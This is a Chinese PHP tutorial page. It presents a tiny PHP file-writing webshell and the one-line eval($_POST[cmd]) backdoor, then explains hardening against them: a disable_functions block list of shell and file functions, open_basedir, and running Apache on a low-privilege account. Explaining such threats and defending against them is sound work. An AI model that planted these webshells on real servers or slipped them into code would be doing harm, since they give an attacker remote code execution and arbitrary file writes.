全世界最小的php网页木马一枚 附PHP木马的防范方法


Posted in PHP onOctober 09, 2009

php网页木马

<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
} 
?>

一句话php木马
<?php eval($_POST[cmd]);?>

PHP木马的防范方法
PHP是能让你生成动态网页的工具之一。PHP网页文件被当作一般HTML网页文件来处理并且在编辑时你可以用编辑HTML的常规方法编写PHP。
PHP代表,超文本预处理器(PHP: Hypertext Preprocessor),可以从PHP官方站点(http://www.php.net)自由下载。PHP遵守GNU公共许可(GPL),在这一许可下诞生了许多流行的软件诸如Linux和Emacs。PHP在大多数Unix平台,GUN/Linux和微软Windows平台上均可以运行。怎样在Windows环境的PC机器或Unix机器上安装PHP的资料可以在PHP官方站点上找到。安装过程很简单。
PHP的另一好处就在于他的安全性,随着现在互联网的发展,网络安全越来越受重视,PHP的诞生几乎代替了ASP,因为PHP对于安全方面的设置是极为简单的不像ASP那样需要很多的步骤,和禁用很多的服务。不过再好的东西也始终会有不足,如果默认设置的PHP同意也是不堪一击,因此本文就来讲一下如何对PHP进行一些安全方面的配置,来防止脚本木马的破坏。
一、防止php木马执行webshell
打开safe_mode, 在,php.ini中设置 disable_functions= passthru,exec,shell_exec,system 二者选一即可,也可都选。
二、防止跳出web目录
首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_value open_basedir /usr/local/apache/htdocs ,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,如果错误显示打开的话会提示这样的错误: Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。
三、防止php木马读写文件目录
在php.ini中的 disable_functions= passthru,exec,shell_exec,system 后面加上php处理文件的函数,主要有 fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile 。即成为 disable_functions= passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir ,fopen,fread,fclose,fwrite,file_exists ,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile 。
ok,大功告成,php木马拿我们没辙了,遗憾的是这样的话,利用文本数据库的那些东西就都不能用了。 如果是在windos平台下搭建的apache还需要注意一点,apache默认运行是system权限,必须给apache降降权限,如下:
net user apache f**kmicrosoft /add
net localgroup users apache /del
此时建立了一个不属于任何组的用户apche,只要打开计算机管理器-服务-apache服务的属性-log on-this account,在这里填入上面所建立的账户和密码,重启apache服务即可实现apache运行在低权限下。
总结:实际上还可以通过设置各个文件夹的权限,给每一个目录建立一个单独能读写的用户,来实现安全。当前很多虚拟主机提供商的流行配置方法,不过这种方法用于防止这里就显的有点大材小用了。只要我们管理员有安全意识,相对的禁闭不用的功能就可以保证网络安全的威胁。

下面是mcafee的安全设置,防止一些网页木马生成文件等。
https://3water.com/hack/list461_1.html

PHP 相关文章推荐
php模板中出现空行解决方法
Mar 08 PHP
PHP里的中文变量说明
Jul 23 PHP
表格展示无限级分类(PHP版)
Aug 21 PHP
用PHP实现浏览器点击下载TXT文档的方法详解
Jun 02 PHP
PHP获取表单所有复选框的值的方法
Aug 28 PHP
php中simplexml_load_file函数用法实例
Nov 12 PHP
php常用hash加密函数
Nov 22 PHP
php获取指定日期之间的各个周和月的起止时间
Nov 24 PHP
yii2 RBAC使用DbManager实现后台权限判断的方法
Jul 23 PHP
php mysql PDO 查询操作的实例详解
Sep 23 PHP
ThinkPHP5+Layui实现图片上传加预览功能
Aug 17 PHP
详解PHP多个进程配合redis的有序集合实现大文件去重
Mar 06 PHP
PHP 字符串分割和比较
Oct 06 #PHP
PHP parse_url 一个好用的函数
Oct 03 #PHP
php面向对象全攻略 (十七) 自动加载类
Sep 30 #PHP
php面向对象全攻略 (十六) 对象的串行化
Sep 30 #PHP
php面向对象全攻略 (十五) 多态的应用
Sep 30 #PHP
php面向对象全攻略 (十四) php5接口技术
Sep 30 #PHP
php面向对象全攻略 (十二) 抽象方法和抽象类
Sep 30 #PHP
You might like
PHP 字符串加密函数(在指定时间内加密还原字符串,超时无法还原)
2010/04/28 PHP
php/js获取客户端mac地址的实现代码
2013/07/08 PHP
php实现图片添加水印功能
2014/02/13 PHP
PHP实现上一篇下一篇的方法实例总结
2016/09/22 PHP
thinkPHP5框架实现多数据库连接,跨数据连接查询操作示例
2019/05/29 PHP
Yii使用DbTarget实现日志功能的示例代码
2020/07/21 PHP
删除重复数据的算法
2006/11/23 Javascript
javascript json2 使用方法
2010/03/16 Javascript
js调用webservice中的方法实现思路及代码
2013/02/25 Javascript
用js来获取上传的文件名纯粹是为了美化而用
2013/10/23 Javascript
通过JS来判断页面控件是否获取焦点
2014/01/03 Javascript
JS中的THIS和WINDOW.EVENT.SRCELEMENT详解
2015/05/25 Javascript
JS实现无缝循环marquee滚动效果
2017/05/22 Javascript
React Native中NavigatorIOS组件的简单使用详解
2018/01/27 Javascript
微信小程序实现基于三元运算验证手机号/姓名功能示例
2019/01/19 Javascript
vue基础之事件v-onclick=&quot;函数&quot;用法示例
2019/03/11 Javascript
layui radio单选限制下一个radio单选的实例
2019/09/03 Javascript
vue设置一开始进入的页面教程
2019/10/28 Javascript
React冒泡和阻止冒泡的应用详解
2020/08/18 Javascript
Python中的startswith和endswith函数使用实例
2014/08/25 Python
在Python的循环体中使用else语句的方法
2015/03/30 Python
视觉直观感受若干常用排序算法
2017/04/13 Python
Python3处理HTTP请求的实例
2018/05/10 Python
详解python如何在django中为用户模型添加自定义权限
2018/10/15 Python
Python装饰器限制函数运行时间超时则退出执行
2019/04/09 Python
解析python的局部变量和全局变量
2019/08/15 Python
日本一家专门经营各种箱包的大型网站:Traveler Store
2016/08/03 全球购物
Whittard官方海外旗舰店:英国百年茶叶品牌
2018/02/22 全球购物
ETO男装官方网店:ETO Jeans
2019/02/28 全球购物
学校食品安全实施方案
2014/06/14 职场文书
设计专业自荐信
2014/06/19 职场文书
工作证明范本(2篇)
2014/09/14 职场文书
运动会表扬稿
2015/01/16 职场文书
2016年植树节红领巾广播稿
2015/12/17 职场文书
golang中字符串MD5生成方式总结
2021/07/04 Golang
Java实现简单小画板
2022/06/10 Java/Android